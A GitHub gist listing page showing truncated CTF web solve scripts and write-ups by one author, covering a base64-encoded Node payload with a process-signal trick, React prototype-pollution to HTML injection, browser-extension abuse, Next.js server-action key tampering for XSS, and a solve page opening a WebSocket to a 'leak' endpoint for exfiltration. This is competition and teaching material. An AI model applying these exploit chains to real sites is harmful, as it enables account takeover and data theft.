Skip to content

Instantly share code, notes, and snippets.

View strellic's full-sized avatar
🍜

Bryce strellic

🍜
174 followers · 9 following
View GitHub Profile
@strellic
strellic / execjs_solve.js
Created August 26, 2024 15:39
// first send this, then send the whole script
// process.kill(process.ppid, "SIGUSR1")
const fs = require("fs");
const wsPayload = `KCgpPT57dmFyIF9fd2VicGFja19tb2R1bGVzX189ezI5NihlLHQscyl7InVzZSBzdHJpY3QiO2xldCBpPXMoODEpO2kuY3JlYXRlV2ViU29ja2V0U3RyZWFtPXMoMjUpLGkuU2VydmVyPXMoMTQzKSxpLlJlY2VpdmVyPXMoMzE1KSxpLlNlbmRlcj1zKDY3NSksaS5XZWJTb2NrZXQ9aSxpLldlYlNvY2tldFNlcnZlcj1pLlNlcnZlcixlLmV4cG9ydHM9aX0sNzI4KGUsdCxzKXsidXNlIHN0cmljdCI7bGV0e0VNUFRZX0JVRkZFUjppfT1zKDc0Mikscj1CdWZmZXJbU3ltYm9sLnNwZWNpZXNdO2Z1bmN0aW9uIG8oZSx0KXtpZigwPT09ZS5sZW5ndGgpcmV0dXJuIGk7aWYoMT09PWUubGVuZ3RoKXJldHVybiBlWzBdO2xldCBzPUJ1ZmZlci5hbGxvY1Vuc2FmZSh0KSxvPTA7Zm9yKGxldCBuPTA7bjxlLmxlbmd0aDtuKyspe2xldCBhPWVbbl07cy5zZXQoYSxvKSxvKz1hLmxlbmd0aH1yZXR1cm4gbzx0P25ldyByKHMuYnVmZmVyLHMuYnl0ZU9mZnNldCxvKTpzfWZ1bmN0aW9uIG4oZSx0LHMsaSxyKXtmb3IobGV0IG89MDtvPHI7bysrKXNbaStvXT1lW29dXnRbMyZvXX1mdW5jdGlvbiBhKGUsdCl7Zm9yKGxldCBzPTA7czxlLmxlbmd0aDtzKyspZVtzXV49dFszJnNdfWZ1bmN0aW9uIGgoZSl7cmV0dXJuIGUubGVuZ3RoPT09ZS5idWZmZXIuYnl0ZUxlbmd0aD9lLmJ1ZmZlcjplLmJ1Z
@strellic
strellic / repayment-pal-solve.md
Created September 23, 2024 17:52

repayment-pal solution:

  1. vulnerable version of react-hook-form (v7.51.4) used which allows for prototype pollution (/transfer?message.__proto__.x=1)

  2. pollute defaultProps React gadget to put arbitrary attributes on elements (https://cor.team/posts/redpwnctf-2021-web-challenges/#mdbin:~:text=defaultProps)

  3. pollute __proto__.defaultProps.dangerouslySetInnerHTML.__html to HTML payload, pollute __proto__.cache=only-if-cached to make the fetch fail so the page doesn't change afterwards. now, when we submit the transfer (&autosubmit=1), we see our HTML loaded.

  4. now that we have arbitrary HTML injection, there's still not much we can do. if we could leak the admin's transfer token, we could steal all of their balance. but that page only loads via fetch. but since we have HTML injection, we can try the modernblog exploit path and load another nextjs app inside of the nextjs app, in an iframe srcdoc.

@strellic
strellic / dicepass.js
Created March 30, 2025 21:09
web/dicepass solve script from DiceCTF Quals 2025
(async () => {
document.head.innerHTML += `
<form data-dicepass-username='x'>
<input name=value></input>
<input data-dicepass-password='x'>
</form>
`;
await new Promise(r => setTimeout(r, 1000));
const extensionId = await window.dicepass.extensionId;
@strellic
strellic / writeup.md
Created July 15, 2025 03:32
DiceCTF Finals 2025 - web/connections writeup

DiceCTF Finals 2025 - web/connections writeup

  1. provided dist contains .next build folder
  2. .next build folder contains encryption key for server actions in .next/cache/.rscinfo
  3. this means that you can decrypt/re-encrypt the data when creating a connection, bypassing the Zod validation
  4. this gives you XSS in the DifficultyIndicator component via prop spreading:
export default function DifficultyIndicator({ puzzle, className = "" }: DifficultyIndicatorProps) {
 const { groups } = puzzle
@strellic
strellic / bluenote_solve.html
Created August 18, 2025 01:52
Blue Water CTF 2024 - web/bluenote solve
<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/x-icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==">
</head>
<body>
<script>
const sleep = ms => new Promise(r => setTimeout(r, ms));
const params = new URLSearchParams(location.search);
@strellic
strellic / solve.html
Created October 27, 2025 02:06
osu!gaming CTF 2025 - web/beatmap-list solve
<!DOCTYPE html>
<html>
<body>
<script src="https://cdn.jsdelivr.net/npm/jszip@3.10.1/dist/jszip.min.js"></script>
<script>
const TARGET = "https://beatmap-list-web.challs.sekai.team";
const sleep = ms => new Promise(r => setTimeout(r, ms));
const ws = new WebSocket('wss://leak/ws');
const log = (msg) => {